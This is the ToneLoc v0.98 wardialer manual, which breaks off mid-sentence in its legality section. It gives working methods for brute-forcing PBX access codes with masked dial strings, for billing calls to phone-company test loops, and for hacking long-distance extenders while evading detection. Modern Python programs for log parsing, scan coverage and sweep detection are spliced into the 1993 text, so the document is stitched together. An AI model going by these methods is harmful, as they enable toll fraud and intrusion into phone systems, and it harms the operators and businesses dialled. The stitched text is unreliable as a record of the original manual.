ToneLoc v0.98 User Manual, by Minor Threat and Mucho Maas

ToneLoc v0.98

User Manual

by

Minor Threat & Mucho Maas

ToneLoc is short for Tone Locator, and is a bit of a wild thing.
What it does is simple: it dials numbers, looking for some kind of tone.
It can also look for carriers like an ordinary wardialer.

It is useful for:

1. Finding PBX’s.
2. Finding loops or milliwatt test numbers.
3. Finding dial-up long distance carriers.
4. Finding any number that gives a constant tone, or something
that your modem will recognize as one.
5. Finding carriers (other modems)
6. Hacking PBX’s.

Before you even start using ToneLoc, PLEASE PLEASE take the time to
print out and read the docs. Well, you don’t have to print them out,
but at LEAST read them. ToneLoc is extremely flexible and can be
configured to work on almost any modem under almost any environment. It
has been extensively tested on everything from generic 1200’s to USR
16.8k duals. Unfortunately, flexibility has its price. You can
probably get just about anything short of an acoustic coupler to work
with ToneLoc, but you’ll need to spend some time configuring it
properly. Trust us, reading the docs now will alert you to many useful
features, and save you headaches later. To sum it up, ToneLoc rocks and
if you don’t read the docs, you’re a LAMER!

Here are the command line options for ToneLoc:

ToneLoc [DataFile] /M:[Mask] /R:[Range] /D:[ExRange] /X:[ExMask]
/C:[Config] /S:[StartTime] /E:[EndTime] /H:[Hours] /T[-] /K[-]

You can use “:” or “-” as a delimiter. If you don’t use “:” or “-”,
ToneLoc will assume there is no delimiter. Example: ToneLoc [DataFile]
/M[Mask] …

When you run ToneLoc you need to give it at least one command line
parameter. The only required parameter is a data filename; the rest are
optional. The optional parameters can come in any order. If you only
provide a filename, the filename is also used as the mask. A mask tells
ToneLoc what numbers to dial. A mask will look something like this:
555-1XXX. The X’s are replaced by ToneLoc with random numbers. It will
never dial the same random number twice in the same mask. If you exit
before the mask has been exhausted, ToneLoc will save the array of
numbers dialed and their results in the data file. You should never
have more than 4 X’s in a mask. ToneLoc will run, but since ToneLoc
uses integer variables, the numbers will be all screwed up, since 5 X’s
would have 100,000 possible numbers which is more than 32,768 (integer)
and 65,536 (word). If you have no idea what we’re talking about, just
trust us and don’t put 5 X’s in the mask.

The next command line parameter is the Mask (/M). If you use this,
your data filename can be anything you want, and the mask will be taken
from the string following /M.

The next parameter is the range to dial (/R). This makes it easier
to specify a range of numbers without having to exclude numbers. Say
you want to dial from 835-1000 to 835-2000, you would run:
TONELOC 835-XXXX /R:1000-2000.

The next parameter is the range to NOT dial (/D). Say you want to
dial 345-xxxx, but you know that 345-9000 – 345-9999 are all payphones.
Run: TONELOC 345-XXXX /D:9000-9999. ToneLoc would dial everything
except the 9000-9999 range.

Another way to accomplish the same thing would be to use an Exclude
mask. (/X) This is a mask of numbers NOT to dial. To dial the entire
345 prefix, EXCEPT the 5000-5999 range, you could run:

TONELOC 345-XXXX /X:5XXX

Notice that is “/X:5XXX” and not “/X:345-XXXX”. The Exclude mask must be
a subset of the original mask. You can specify up to 10 exclude masks.

Excluded numbers (from masks or ranges) are only excluded for the
current run of ToneLoc – the flagging is not permanent. Between your
dial masks and ranges you should be able to obtain a good degree of
specificity in your scan.

The next command line parameter (/C) is which configuration file to
use (.CFG). This file contains all of the configuration data for ToneLoc,
such as which COM port to use, the baud rate, window colors, dial string,
etc. See the configuration file for details.

The next parameter is the starting time (/S). ToneLoc will wait
until this time to begin the dial scan. You can use either standard
time notation (5:30p) or military time (17:30) for any time parameter.
You can hit any key to start early.

The next parameter is the ending time (/E). When this time is
reached ToneLoc will end the current scan.

The next parameter is a useful shortcut (/H). It specifies an end
time at a certain number of hours and minutes past the start time. If
you specify a start time and a number of hours (/S:10:00p /H:5:30), the
end time will be the start time plus the number of hours desired (3:30
AM). If you specify both an end time and a number of hours, the number
of hours will take precedence.

The next few parameters are overrides for the scan type (/T, /K,
/T-, /K-). This is usually set in the config file, but this parameter
overrides it. To scan for tones you’d use /T. To scan for everything
except tones use /T-. To scan for carriers you’d use /K, to scan for
everything except carriers use /K-. The inverted scan modes are useful
for hacking a PBX; see below on hacking PBX’s.

The datafile should be 10016 bytes at all times. If you have data
files from previous versions of ToneLoc, there is a utility included with
ToneLoc called “TCONVERT” that will bring your data files up-to-date.
There can be as many data files in the directory as you want. Don’t
forget to SAVE your data files, they don’t take too much space, and they
are great with ToneMap (see below).

Here are a few example command lines:

ToneLoc 346-XXXX
        - Dial 346-0000 to 346-9999 using the default configuration
          file, saving responses to the data file 346-XXXX.DAT.

ToneLoc 950-5XXX /C:NINE5
        - Dial 1000 numbers, from 950-5000 to 950-5999 (randomly),
          and use the configuration file NINE5.CFG. This
          configuration file might skip rings and have a short
          wait. This could be used for dialups.

ToneLoc 474-9XXX /X:1XX
        - Dial 1000 numbers, from 474-9000 to 474-9999 (randomly),
          using the default configuration file TONELOC.CFG, but
          exclude 474-9100 to 474-9199. Also see next example.

ToneLoc 474-XXXX /R:9000-9999 /X:91XX
        - Same as above, but easier to understand. This method is
          better for another reason: If you scan 9000-9999 now, and
          later decide to scan the rest of the prefix, this method
          would keep the whole scan in one data file, rather than
          having 474-9XXX.DAT and 474-XXXX.DAT.

ToneLoc 474-XXXX /R:9000-9999 /D:9100-9199
        - Another version of the above.

ToneLoc 836-99XX /C:LOOP /S:21:30
        - Dial from 836-9900 to 836-9999 (100 numbers) using the
          config file LOOP.CFG, but waiting until 9:30 PM to begin
          dialing.

ToneLoc TEST /M555-1XXX /H:5:00 /x:3XX /x:1XX
        - Dial the numbers from 555-1000 to 555-1999 for five hours
          maximum, saving the dialed numbers to TEST.DAT, and
          excluding the ranges 1300-1399 and 1100-1199.

ToneLoc 677-8xxx /E:8:30a
        - Dial the numbers 677-8000 to 677-8999 until 8:30 AM,
          saving the dialed numbers to 677-8XXX.DAT.

The optional parameters can come in any order, but the name of the
datafile MUST be the first parameter. If there is no mask specified, the
data file name is used as the mask.

We hope you are impressed by the way the screen looks while dialing.
The screen is split up into 3 major windows. The first window, called the
Activity Log, takes up the entire left half of the screen. It tells you
what is going on. If LOGGING is ON, everything that appears here also
goes to the log file. The following messages may appear in the message
log:

22:54:09 »
        This is written at the beginning of each run. It makes it
        easier for you to separate ToneLoc runs in the log file.

22:53:53 ToneLoc started on 31-Jan-93
        This is self explanatory.

22:53:53 Data file: 403-XXXX.DAT
        This shows which file ToneLoc is using to store the dialed
        numbers.

22:53:53 Config file: TONELOC.CFG
        This shows which file ToneLoc has loaded the configuration
        information from. TONELOC.CFG is the default configuration
        file.

22:53:53 Log file: TONE.LOG
        This shows which file ToneLoc is logging the scan to. This
        file name is set in the configuration file and can be changed
        there.

22:53:53 Mask used: 403-XXXX
        This tells what mask you used for the current run.

22:53:53 Exclude mask 1: 8XXX
        Shows which numbers you AREN’T dialing in the current run.

22:53:53 Initializing modem ...
        ToneLoc is trying to initialize the modem. It will either
        give a “Done” message or a “Failed” Message. Toneloc will
        try 3 times to initialize the modem.

22:53:53 Waiting until 09:30:00
        ToneLoc is waiting until 9:30 AM to start the current scan.
        You can hit any key to start early.

23:30:44 474-5294 - Timeout (1)
        This means the number was dialed, it rang ONCE (notice the ‘(1)’ ),
        and then it timed out without finding anything.

23:30:56 474-5335 - Timeout (3)
        This means the number was dialed, and nothing was found during
        the WaitDelay. The (3) indicates there were three rings.

23:31:00 474-5978 - No Dialtone #1
        This means when ToneLoc tried to dial, there was no dial tone
        found (your dialtone). When this happens, ToneLoc tries the
        same number again, until it has tried the number of times
        specified by NoToneAbort in the config file.

23:39:02 474-5685 - Busy
        This means the number dialed was busy.

00:24:26 474-5989 - ** TONE **
        Holy Shit! You found a tone. It is probably either a loop,
        PBX, or dial-up LD carrier. Now it’s your job to hack it out
        and use it!

09:14:34 353-0911 - * CARRIER *
        Even better! You found a carrier. If you’re lucky, it’s
        your DATAKIT dialup. Otherwise, it could be a BellCore
        unix! Of course it could be a do-nothing carrier. Those suck.

00:24:26 474-5489 - Voice (1)
        This means your modem detected a voice answer. Good modems
        like the USR HST/DS can detect voice. X5 or X6 in your init
        string will enable this on a HST/DS. CAUTION: the “VOICE”
        response can be triggered by some dialtones, so you may want
        to disable this if you are scanning for tones. See below.

06:45:43 Ringout (3)
        This means MaxRings (in this case 3) was reached and the dial
        was aborted. See below for a discussion of rings.

15:11:23 474-5555 - * Blacklisted #5 *
        This means the number was found in the BlackList file
        (the 5th entry), so it was not dialed. This is highly
        recommended for areas with Caller ID and ex-girlfriends.

00:45:01 Autosaving
        This means Toneloc is backing up the .DAT file after the
        interval set in the config file.

04:53:12 Stopping at 10:00:21
        ToneLoc has reached the stop time specified after /E and is
        exiting the current scan.

03:00:32 All 10000 codes exhausted
        Damn, you dialed every possible number! 3 X’s means 1000
        numbers are possible. 4 X’s means 10,000 numbers are
        possible, etc. Like this: 10^X, where X is the number of X’s
        in the mask. Math sucks.

Other messages are in response to input:

00:25:31 474-5629 - Speaker ON
        By hitting S you can toggle the speaker on and off DURING a
        scan. ToneLoc will beep high (ON) or low (OFF) depending on
        the status of the speaker. ToneLoc waits until it is finished
        with the current dial to toggle the speaker.

00:28:45 474-9091 - Volume set to 3
        By hitting a number 0-9 you can set the volume level with the
        commands defined in the Config file. You can also use them for
        customized commands.

00:25:59 474-5985 - * Noted *
        You can hit N to make a note in the log next to this number.
        Aborts current number. Use it when you find something
        interesting like a drunk cowboy yelling at you through the
        phone. Other note keys are:
                C - Carrier
                F - Fax
                G - Girl
                K - Custom note (you can type a note yourself)
                V - VMB
                Y - Yelling asshole

00:27:23 474-5239 - Jumped to DOS
        Hit J to shell to DOS. Just type EXIT to return. This will
        abort the current number being dialed, but ToneLoc will redial
        it after you return from DOS. Be careful to “exit” and not
        to just re-run Toneloc.

00:27:45 474-5722 - Redialing
        Hit R to redial the current number. Useful if a number doesn’t
        “take” or you want to fuck with that drunk cowboy who answered
        last time.

00:30:45 474-5123 - Escaped
03:30:45 Dials/hour : 225
00:30:46 ToneLoc Exiting ...
        Hitting escape will abort the current number and exit the
        program. ToneLoc writes the average number of dials per hour
        to the log file.

00:28:12 474-5756 - Aborted
        Hitting the Spacebar will abort the current number.

00:45:23 454-5365 - Paused
        Pressing P will stop the current dial and wait for another
        keypress before continuing. Good in case you want to use
        the phone for a sec.

A few keys don’t have screen responses:

X : Adds 5 seconds to the WaitDelay time for this dial only. Can be
used repeatedly on the same dial.
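The log lines listed above follow a fixed shape, so a recovered or audit log can be tallied mechanically. The following is an added example, not part of ToneLoc: the field layout is inferred from the sample lines in this manual, the log text is constructed, and the function names are hypothetical.

```python
import re
from collections import Counter

# Time, an optional "number - " field, then the message. The copy of the
# manual on this page shows an en dash where a hyphen is expected, so both
# are accepted (assumption).
LINE = re.compile(r"^(\d\d):(\d\d):(\d\d)\s+(?:(\S+)\s+[-\u2013]\s+)?(.*?)\s*$")

# Result messages documented in the manual, with the bracketed count if any.
RESULTS = [
    ("tone", re.compile(r"\*\* TONE \*\*")),
    ("carrier", re.compile(r"\* CARRIER \*")),
    ("timeout", re.compile(r"Timeout \((\d+)\)")),
    ("busy", re.compile(r"Busy")),
    ("voice", re.compile(r"Voice \((\d+)\)")),
    ("ringout", re.compile(r"Ringout \((\d+)\)")),
    ("no_dialtone", re.compile(r"No Dialtone #(\d+)")),
    ("blacklisted", re.compile(r"\* Blacklisted #(\d+) \*")),
]
# Results that mean a call was actually placed and finished (assumption:
# blacklisted numbers and "No Dialtone" retries are not completed dials).
COMPLETED = {"tone", "carrier", "timeout", "busy", "voice", "ringout"}


def parse_line(line):
    """Split one activity-log line into time, number, result kind and count."""
    m = LINE.match(line.strip())
    if not m:
        return None
    hh, mm, ss, number, text = m.groups()
    kind, detail = ("other" if number else "session"), None
    for name, pattern in RESULTS:
        hit = pattern.fullmatch(text)
        if hit:
            kind = name
            detail = int(hit.group(1)) if hit.groups() else None
            break
    return {"seconds": int(hh) * 3600 + int(mm) * 60 + int(ss),
            "number": number, "kind": kind, "detail": detail, "text": text}


def summarize(log_text):
    """Tally one continuous run: result counts, hits, elapsed time, dial rate."""
    counts, hits = Counter(), []
    elapsed, previous = 0, None
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        if previous is not None:
            # Only the time of day is logged, so a smaller value than the
            # previous line means the run went past midnight.
            elapsed += (entry["seconds"] - previous) % 86400
        previous = entry["seconds"]
        if entry["kind"] == "session":
            continue
        counts[entry["kind"]] += 1
        if entry["kind"] in ("tone", "carrier"):
            hits.append((entry["number"], entry["kind"]))
    dials = sum(counts[k] for k in COMPLETED)
    rate = round(dials * 3600 / elapsed, 1) if elapsed else 0.0
    return {"counts": dict(counts), "hits": hits, "dials": dials,
            "elapsed_seconds": elapsed, "dials_per_hour": rate}


# Constructed sample log (fictional 555-01XX numbers), crossing midnight.
SAMPLE_LOG = """\
23:58:00 ToneLoc started on 31-Jan-93
23:58:00 Mask used: 555-01XX
23:58:10 555-0142 - Timeout (1)
23:58:50 555-0107 - Busy
23:59:30 555-0199 - No Dialtone #1
23:59:40 555-0199 - Timeout (3)
00:00:20 555-0118 - ** TONE **
00:01:00 555-0163 \u2013 * CARRIER *
00:01:30 555-0150 - * Blacklisted #2 *
00:02:00 555-0171 - Voice (1)
00:02:40 555-0125 - Aborted
00:03:00 ToneLoc Exiting ...
"""

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```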

Ok, on to the next window. The top-right corner of your screen is
the modem window. Everything that is returned from your modem is shown
here. This isn’t very useful, except maybe for debugging, but it looks
neat.

The last window is in the bottom-right part of the screen. It’s
called the Statistics window. It shows a bunch of cool stuff like….

■ The time you began scanning.
■ The current time.
■ The maximum number of possible numbers,
  based on your mask and negative mask.
■ The number of numbers already dialed.
■ Number of responses for CD (carriers), Tone, Voice, Busy, & Ringout.
■ The average number of dials per hour.
■ ETA – Estimated Time to Arrival (or completion).
  This is the number of hours and minutes left in the scan, based
  on your current dials per hour and numbers left.
■ The number of rings so far in the current dial.
■ Last 5 tones or carriers found.

You’ll also notice (you better!) the meter at the bottom right.
Pretty cool huh? It just shows the progress of the current call. This
is a graphic representation of the elapsed wait time as set in the config
file. If you can’t stand to look at a still screen, set a fancy meter
wipe option in the config file.

The Black List File:
--------------------

This is a file of up to 1000 numbers that ToneLoc should never dial.
Put your own numbers here, your friends’ numbers, the police department,
fire department, etc. Each number should be on its own line exactly as
ToneLoc will dial them. For example the entry “555-1212” will only
blacklist the number “555-1212”, not “1-555-1212” or “5551212”. If
ToneLoc comes up with one of these numbers as a candidate for a dial
attempt, it will skip it and move on to the next number. Anything after
a semicolon (;) is ignored, so you can comment this file.
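The mask, range and exclude options from the command-line section and the exact-match rule for this blacklist file can be checked with a short added example (not ToneLoc code). It computes which numbers a given option set covers; reading /R and /D as inclusive ranges over the X digits and requiring one exclude-mask character per X are assumptions taken from the manual's examples, and the function names are hypothetical.

```python
def parse_blacklist(text):
    """One number per line, exactly as dialed; text after ';' is a comment."""
    entries = [line.split(";", 1)[0].strip() for line in text.splitlines()]
    entries = [entry for entry in entries if entry]
    if len(entries) > 1000:
        raise ValueError("the manual allows up to 1000 blacklist entries")
    return entries


def _matches(exclude_mask, digits):
    """True if every fixed digit of the exclude mask equals the candidate's."""
    return all(m in "xX" or m == d for m, d in zip(exclude_mask, digits))


def coverage(mask, dial_range=None, skip_range=None,
             exclude_masks=(), blacklist=()):
    """Return (selected, blacklisted) number lists for one option set.

    mask          -- e.g. "474-XXXX"; each X is one digit position
    dial_range    -- /R as (low, high) over the X digits, inclusive
    skip_range    -- /D as (low, high) over the X digits, inclusive
    exclude_masks -- /X masks, one character per X in the mask
    blacklist     -- entries from parse_blacklist()
    """
    slots = [i for i, ch in enumerate(mask) if ch in "xX"]
    width = len(slots)
    if not 1 <= width <= 4:
        # The manual warns that 5 X's overflow ToneLoc's integer variables.
        raise ValueError("mask must contain 1 to 4 X's")
    if len(exclude_masks) > 10:
        raise ValueError("the manual allows up to 10 exclude masks")
    for exclude in exclude_masks:
        if len(exclude) != width:
            raise ValueError(f"exclude mask {exclude!r} needs {width} characters")
    low, high = dial_range or (0, 10 ** width - 1)
    if not 0 <= low <= high < 10 ** width:
        raise ValueError("range does not fit the mask")

    banned = set(blacklist)
    selected, blacklisted = [], []
    for value in range(low, high + 1):
        digits = f"{value:0{width}d}"
        if skip_range and skip_range[0] <= value <= skip_range[1]:
            continue
        if any(_matches(exclude, digits) for exclude in exclude_masks):
            continue
        chars = list(mask)
        for position, digit in zip(slots, digits):
            chars[position] = digit
        number = "".join(chars)
        # Blacklist comparison is a plain string match on the dialed form.
        (blacklisted if number in banned else selected).append(number)
    return selected, blacklisted


# Constructed blacklist: only the first entry has the same form as the mask.
SAMPLE_BLACKLIST = """\
555-1212    ; matches numbers produced by the mask 555-1XXX
5551999     ; no hyphen, so it never matches 555-1999
1-555-1000  ; leading 1, so it never matches 555-1000
"""

if __name__ == "__main__":
    # The manual's three equivalent ways to cover 474-9000..9999 minus 91XX.
    a, _ = coverage("474-9XXX", exclude_masks=["1XX"])
    b, _ = coverage("474-XXXX", dial_range=(9000, 9999), exclude_masks=["91XX"])
    c, _ = coverage("474-XXXX", dial_range=(9000, 9999), skip_range=(9100, 9199))
    print(len(a), a == b == c)
    kept, skipped = coverage("555-1XXX", blacklist=parse_blacklist(SAMPLE_BLACKLIST))
    print(skipped, "555-1999" in kept)
```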

Rings And The X Parameter:
--------------------------

This discussion refers in particular to newer USRobotics modems. If
you are using another brand of modem you’ll probably have to sort
through the details yourself.

This can get a little confusing so a little detail is in order.
There are several ways to deal with the RINGING message that your modem
can generate. The simplest is to simply disable it with the X4 command
in your modem init string. With X4, RINGING and VOICE will be suppressed
as responses. This is simple enough, but you won’t get much diagnostic
detail in your logs or .DAT files, and your scan will take longer
because more of the calls will go all the way until timeout instead of
aborting earlier because of a Ringout or Voice response. You can enable
these messages with the X6 flag, which will respond with VOICE and
RINGING when it is detected. Unfortunately, the USR is no AppleCat, and
VOICE can give a false response when you are looking for dialtones. Of
particular importance, the high pitched tone (2600hz aka wink-start)
which precedes many PBX’s initial dialtone will cause a VOICE response.

X7 suppresses the VOICE response, but leaves the RINGING response.
In our experience RINGING is seldom a false response, and any potential
VOICE responses will show up as BUSY’s. If you decide to use X7, you’ll
need to adjust the MaxRings parameter in your config file. Experiment a
little bit to decide how to set it. If you set it to 0, the number of
rings will be recorded, but ToneLoc will never abort because of rings.

If you are using a USRobotics modem to scan for carriers, however,
you should use the X6 command since the modem will never give a false
response when looking for carriers. Your scan will go faster, and your
.DAT file will be more detailed.

After the Scan:
---------------

Well now that I have some dial tones, what the fuck do I do with
them? First, figure out what kind of a number it is.

PBX’s usually have a 3-8 digit code, but they can be longer, or they
can have NO code. If you enter the correct code, you will hear a second
dial tone. Otherwise you will probably get a reorder (fast busy), busy,
a hangup, or ringing. Sometimes it will ring the PBX attendant (the
operator – ugh). But ringing the attendant is a good way to find out
who owns the PBX. Once you get the second dialtone, dial 9+ACN (sometimes
X+ACN, where X is often 7 or 8, and less frequently other digits) to make
a long distance call. (NOTE: ACN = Area Code & Number) Some PBX’s have
no code, you just need to dial 9. Sometimes the code will follow the
number in the format 9+ACN+Code. Sometimes you’ll need to dial 1 first.
Many will also call international. Experiment. See below on hacking them.

It might also be a long-distance extender dial-up. You’ll find many
of them in the prefix 950-xxxx. Sometimes it is easy to hack a code, but
please be careful! They are easy to get busted on. MCI people are dicks.
They get off on busting people, and announcing it to the world. Sprint
doesn’t fuck around either, they’ll bust you, but they like to keep it
quiet. And the little guys are getting smarter too. Consult with
local phreaks before experimenting with an unfamiliar extender.

Here’s a tip. If you scan 950’s you’ll find most will give either a
result of Voice, Ring, or Busy. A few will be Tones, but also a few will
be Timeouts. Investigate these – you may find something interesting,
like a voice-prompted dialup or a modem carrier.

You may also find “Phantoms”. In Mucho’s area there are several MCI
dialup ports that are no longer in use since the full implementation of
Equal Access. Hack all day, you won’t find a code. Try and figure out
what you are hacking before you waste time on a dead end.

Now, for an explanation of loops. We’ll tell you what we know about
them, which ain’t a whole lot. Loops are a pair of phone numbers,
usually consecutive, like 836-9998 and 836-9999. They are used by the
phone company for testing. What good do loops do us? Well, they are
cool in a few ways. Here is a simple use of loops. Each loop has two
ends, a ‘high’ end, and a ‘low’ end. One end gives a (usually) constant,
loud tone when it is called. The other end is silent. Loops don’t usually
ring either. When BOTH ends are called, the people that called each end
can talk through the loop. Some loops are voice filtered and won’t pass
anything but a constant tone; these aren’t much use to you. Here’s what
you can use working loops for: billing phone calls! First, call the end
that gives the loud tone. Then if the operator or someone calls the other
end, the tone will go quiet. Act like the phone just rang and you answered
it … say “Hello”, “Allo”, “Chow”, “Yo”, or what the fuck ever. The
operator thinks that she just called you, and that’s it! Now the phone
bill will go to the loop, and your local RBOC will get the bill! Use this
technique in moderation, or the loop may go down. Loops are probably most
useful when you want to talk to someone to whom you don’t want to give
your phone number.

As for carriers.. well, we would hope you know what to do with a
carrier by now. But if you don’t, a good place to start is The Mentor’s
Guide to Hacking (Phrack, I forget which issue).

ToneMap – Something New
-----------------------

When we first wrote and ran ToneMap, we were amazed by what we saw.
ToneMap reads a ToneLoc .DAT file, and displays the data visually on the
screen. Big deal, right? Actually, it can be useful. We saw more than
just scattered colors. We saw definite patterns within the prefixes we
scanned. Hopefully you took the time to print this doc file out, because
we are going to go over one of the example .DAT files with you.

Run ToneMap like this: “TONEMAP 555-XXXX” and press Enter. (You’ll
need VGA). You should see a square of colors that takes about 2/3 of the
screen, and a key to the colors on the right. Each square represents a
response type of a single phone number in the prefix. It starts at the top
left (0000) and works down and to the right (9999). Each vertical column
is 100 numbers.

Here’s an explanation of the colors:

BLACK = Undialed (Not yet dialed by ToneLoc)
GREY = Timeout (Lighter = more rings before timeout)
ORANGE/RED = Busy number.
DARK BLUE = Blacklisted number.
DARK GREEN = RingOut. (Rang too many times)
LIGHT GREEN = Tone
LIGHT YELLOW = Carrier
CYAN = NOTED Number (‘N’ was pressed)
DARK RED = Aborted (spacebar pressed)

There are other colors too, as you can see in the key, but the ones
above are the important ones. Unless you’re colorblind, you have
probably already noticed a pattern to this prefix. There are some
vertical bands in the middle of the prefix (from about 3900-5900). In
fact, one entire column (3900) is all busy numbers. Use the cursor keys
to move the white cursor around the map. The number on the bottom right
corner will change and you’ll see the result type and color for that
number.

You can get a little or a lot from a .DAT map. If the exchange is
a rural or residential one you’ll probably see an even distribution of
result codes, with a certain level of each major result code. Besides a
different number of timeouts, ringouts, or busys, most residential
exchanges look very similar – an even distribution with no pattern.

In a business exchange you are much more likely to find patterns.
You may find a string or cluster of modems, a large range of similar
timeouts or voice responses, etc. Ranges that are busy (like the 3900
column in our example) could be permanently busy, or some message which
the modem detects as a busy. A series of ringouts could indicate part
of a PBX’s DID (Direct Inward Dial) group. It varies widely, and your
best bet is to always check it out manually – you never know what you’ll
find.

It behooves you to scan your prefixes and study your results. It
is best to scan a prefix in one big scan (555-xxxx rather than 555-0xxx,
555-1xxx, etc) so you can see the whole prefix at once. We would love
to have a look at your results and have a look at your .DAT files – try
to get in touch with us! Who knows … maybe your ToneMap will end
up on a T-shirt someday!

Hacking PBX’s:
--------------

If the PBX code is 4 digits or less you can use ToneLoc to hack it.
The simplest way is to use ToneLoc to look for an internal dialtone.
Let’s say you found a 3 digit PBX at 555-9999 which hangs up on you after
you enter a bad code. You’d use ToneLoc like this:

ToneLoc Example1 /m:555-9999Wxxx

(EXAMPLE1.DAT will be the .dat file, /m: specifies the mask.)

This will produce dialing strings like this: ATDT 555-9999Wxxx W;
ToneLoc will dial the number, wait for a dialtone, try a code, then wait
for a second dialtone. If you get the right code, you’ll get the second
dialtone, otherwise you’ll just get a timeout.

Some PBX’s have alert tones for invalid codes which the W command
will hear as a dialtone. You can’t look for a second dialtone directly
with the W command on these PBX’s, but Toneloc has a scan mode designed
specifically for this problem. Set the scan mode to look for everything
except tones, either in the config file or on the command line, and use
ToneLoc like this:

ToneLoc example2 /m:555-8999WxxxW1

This will produce dialing strings like this: ATDT 555-8999WxxxW1 W;.
Toneloc will dial the number, wait for the first dialtone, dial the
code, wait for a dialtone, dial 1, then wait for a dialtone. If the
code is invalid, the second W command will hear the alert tones as a
dialtone and dial 1. The tones should keep playing, and the third W
will respond to the alert tones too, giving a final response of Tone.
If the code is valid, the second W command will hear the internal
dialtone and the 1 will immediately quiet it since 1xx or 1xxx is a
valid extension on most PBX’s. This would give a final response of
Timeout since the third W command won’t find a tone – and voila, you
have your code. Are you confused yet?

This method might not work if 1xx or 1xxx isn’t a valid extension
on the PBX you are trying to hack, since some PBX’s will immediately
give an alert tone if you dial the first digit of an invalid extension.
If you fail the first time around, and think you might have this
problem, have a look at the phone number for the PBX indial. For
example, if the PBX indial is 555-4321, it’s a good bet that some valid
DID extensions are in or near 4xxx, 3xx, or 2x. Therefore, 4, 3 or 2 is
probably going to be the first digit of a valid extension, making them
good candidates for your terminal digit.

Apparently some PBX’s will respond with a carrier blast to an
invalid code, although we’ve never found one. You can use the
everything-but-a-carrier scan mode for these, or just look for an
internal dialtone if carriers don’t appear as tones to the W command.
(See Dual Scanning).

Cautions & Usage Notes:
-----------------------

We do not have personal experience scanning 1-800 exchanges with
ToneLoc but we recommend that you exercise caution. For a classic
example, see the Fall 1992 issue of 2600 magazine. There is a letter
in there that Minor Threat received once after dialing about 100
1-800 numbers by HAND sequentially! First of all, if you are
looking for tones you may not get much. Many of the PBX’s or extenders
you would be looking for will answer with a short tone, about the length
of a ring. That’s how ToneLoc will perceive those tones – as a ring.
Many of the PBX’s may also answer with silence, and need # or 9 to
activate their tone. Local PBX’s can answer like this as well, however
the 800 exchanges are more likely to have better security since they
are under constant pressure from call-sell operations as well as every
code abuser in the nation. Second, MCI and Sprint can get irritated when
someone makes thousands of calls into their 800 exchange, and, unlike a
local number, they WILL have easy access to at least your area code and
exchange, and probably your entire phone number. Since each 800 call
costs somebody money, and you aren’t conducting legitimate business during
these calls, it might also be considered theft of service.

Hacking an 800 system of any kind, be it a computer, long distance
extender, PBX, or even a VMB system, can be extremely risky. We urge you
to use good judgment. Find a local PBX and divert your call through it.

If you live in an area with the Call Return, Call Trace, or
Caller ID active, you will definitely experience some call returns with
ToneLoc. Politely explain to anyone who calls back that you dialed a
wrong number – don’t provoke them into a Call Trace. Who knows, you
may even meet a fellow hacker (It’s happened to us – TWICE!). If Caller
ID is active, use more caution – they could have your phone number and
scanning could be construed as harassment, especially if it happens at
3:00 am.

In any case, please use some intelligence if you are scanning a
range that belongs to a large company. Often the same operator will have
to answer dozens of incoming phone numbers, and your strange hangups may
get tiresome enough in the course of the day that he or she might decide
to do something about it. Listen in on ToneLoc to figure out what kind
of an exchange you are scanning. If it is principally a business exchange,
consider only scanning at night when the affected businesses are closed.
If it is mostly residential you might want to scan during the day. Make
intelligent use of the exclude mask to eliminate ranges that will most
likely be unproductive – unused ranges, pager numbers, answering services,
cellular phones, etc. If you want an overview of your local exchanges,
first try the yellow pages. You will quickly discover where promising
exchanges are. If you want greater depth, go to your local public library
and ask at the reference desk for the criss-cross directory. A section
of this directory is a listing of the telephone numbers in an exchange.
It does not list unlisted or nonpublished numbers (PBX’s will not show up,
although the PBX billing number might), but it will show you if the
exchange is a residential one or not. Ten minutes of thought can save
you 50 hours of scanning.

When hacking a PBX, have some sense and do it late at night when
nobody is using the PBX. Have a little patience; you’ll be glad you did.
Make sure you hack RANDOMLY – sequential hacking is always a good
way to get noticed (although it probably won’t make a difference in this
case), and besides ToneLoc has a better chance of finding the code sooner.
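Seen from the receiving PBX, a scan dials many different numbers in one block once each with short calls, whatever order they come in. The following added example (not from the manual) flags that pattern in call records; the CSV layout, thresholds, caller labels and function names are assumptions, and the records are constructed.

```python
import csv
import io
import random
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def find_sweeps(cdr_text, block_prefix, window=timedelta(hours=1),
                min_distinct=20, max_seconds=30):
    """Flag callers that reach many distinct numbers of one block with short
    calls inside a sliding time window. Dialing order is not used for the
    decision, so random and sequential scans are both caught."""
    per_caller = defaultdict(list)
    for row in csv.DictReader(io.StringIO(cdr_text)):
        if (row["called"].startswith(block_prefix)
                and int(row["seconds"]) <= max_seconds):
            per_caller[row["caller"]].append(
                (datetime.fromisoformat(row["time"]), row["called"]))

    findings = []
    for caller, events in sorted(per_caller.items()):
        events.sort()
        seen, start, best = Counter(), 0, None
        for end, (when, called) in enumerate(events):
            seen[called] += 1
            # Drop calls that have fallen out of the window.
            while when - events[start][0] > window:
                old = events[start][1]
                seen[old] -= 1
                if not seen[old]:
                    del seen[old]
                start += 1
            if len(seen) >= min_distinct and (best is None or len(seen) > best[0]):
                best = (len(seen), start, end)
        if best:
            distinct, first, last = best
            order = [called for _, called in events[first:last + 1]]
            findings.append({
                "caller": caller,
                "distinct": distinct,
                "from": events[first][0],
                "to": events[last][0],
                # Reported for context only; it does not affect detection.
                "sequential": order == sorted(order),
            })
    return findings


def sample_cdr():
    """Constructed call records for the fictional block 555-01XX."""
    rng = random.Random(7)
    t0 = datetime(1993, 1, 31, 22, 0, 0)
    rows = ["time,caller,called,seconds"]

    def add(offset, caller, suffix, seconds):
        stamp = (t0 + timedelta(seconds=offset)).isoformat()
        rows.append(f"{stamp},{caller},555-01{suffix:02d},{seconds}")

    # CALLER-A: 40 numbers in random order, one short call each.
    for i, n in enumerate(rng.sample(range(100), 40)):
        add(50 * i, "CALLER-A", n, rng.randint(5, 25))
    # CALLER-B: 30 numbers in ascending order, one short call each.
    for i, n in enumerate(range(30)):
        add(60 * i, "CALLER-B", n, 10)
    # CALLER-C: ordinary traffic, the same three numbers over and over.
    for i in range(12):
        add(200 * i, "CALLER-C", (10, 42, 77)[i % 3], 12 if i % 2 else 240)
    return "\n".join(rows)


if __name__ == "__main__":
    for finding in find_sweeps(sample_cdr(), "555-01"):
        print(finding)
```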

Is Scanning Illegal? (Who cares)
--------------------

We don’t know. We’ve heard it is legal to scan during business
hours when the call would not be harassment. We’ve heard it’s not
